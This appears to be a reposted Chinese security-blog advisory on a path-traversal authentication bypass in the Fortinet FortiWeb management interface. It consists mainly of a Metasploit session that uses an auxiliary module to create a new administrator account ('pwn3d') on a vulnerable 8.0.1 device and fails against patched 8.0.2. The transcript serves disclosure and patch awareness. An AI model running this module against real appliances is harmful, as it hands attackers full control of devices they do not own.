文章总结: FortinetFortiWeb管理界面存在一个路径遍历身份验证绕过漏洞,攻击者可利用此漏洞创建新的本地管理员账户,从而完全控制设备。该漏洞影响8.0.2之前的版本,已在最新版本中修复。文档提供了一个Metasploit辅助模块用于验证和利用此漏洞,建议用户尽快升级至安全版本以防范风险。
综合评分: 88
文章分类: 漏洞分析,漏洞预警,渗透测试,WEB安全,安全工具
Fortinet FortiWeb 管理界面中的路径遍历身份验证绕过漏洞
Ots安全
2025年11月15日 16:29
广东
威胁简报
恶意软件
漏洞攻击
概述
此辅助模块利用 Fortinet FortiWeb 管理界面中的路径遍历身份验证绕过漏洞,创建一个新的本地管理员用户帐户。该漏洞似乎已在最新版本的产品中修复8.0.2。
该辅助模块基于Defused 发布的PoC:https://x.com/defusedcyber/status/1975242250373517373。
示例 1(成功抵御 FortiWeb 8.0.1)
msf > use auxiliary/admin/http/fortinet_fortiweb_create_admin
msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > set RHOST 192.168.86.202
RHOST => 192.168.86.202
msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > set NEW_USERNAME pwn3d
NEW_USERNAME => pwn3d
msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > set NEW_PASSWORD pwn3d
NEW_PASSWORD => pwn3d
msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > check
[*] 192.168.86.202:443 - The target appears tobe vulnerable.
msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > run
[*] Running module against 192.168.86.202
[*] Running automatic check ("set AutoCheck false"to disable)
[+] The target appears tobe vulnerable.
[+] New admin account successfully created: pwn3d:pwn3d
[+] Login via https://192.168.86.202:443/login
[*] Auxiliary module execution completed
示例 2(针对 FortiWeb 8.0.2 的失败)
msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > set RHOST 192.168.86.200
RHOST => 192.168.86.200
msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > check
[*] 192.168.86.200:443 - The target is not exploitable. Received a 403 Forbidden response
msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > run autocheck=false
[*] Running module against 192.168.86.200
[!] AutoCheck is disabled, proceeding with exploitation
[-] Auxiliary aborted due to failure: not-vulnerable: Target does not appear vulnerable (403 Forbidden response)
[*] Auxiliary module execution completed
内容参考:
https://github.com/rapid7/metasploit-framework/pull/20698
https://x.com/defusedcyber/status/1975242250373517373
END
公众号内容都来自国外平台-所有文章可通过点击阅读原文到达原文地址或参考地址
排版 编辑 | Ots 小安
采集 翻译 | Ots Ai牛马
公众号 | AnQuan7 (Ots安全)
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:Ots安全 《Fortinet FortiWeb 管理界面中的路径遍历身份验证绕过漏洞》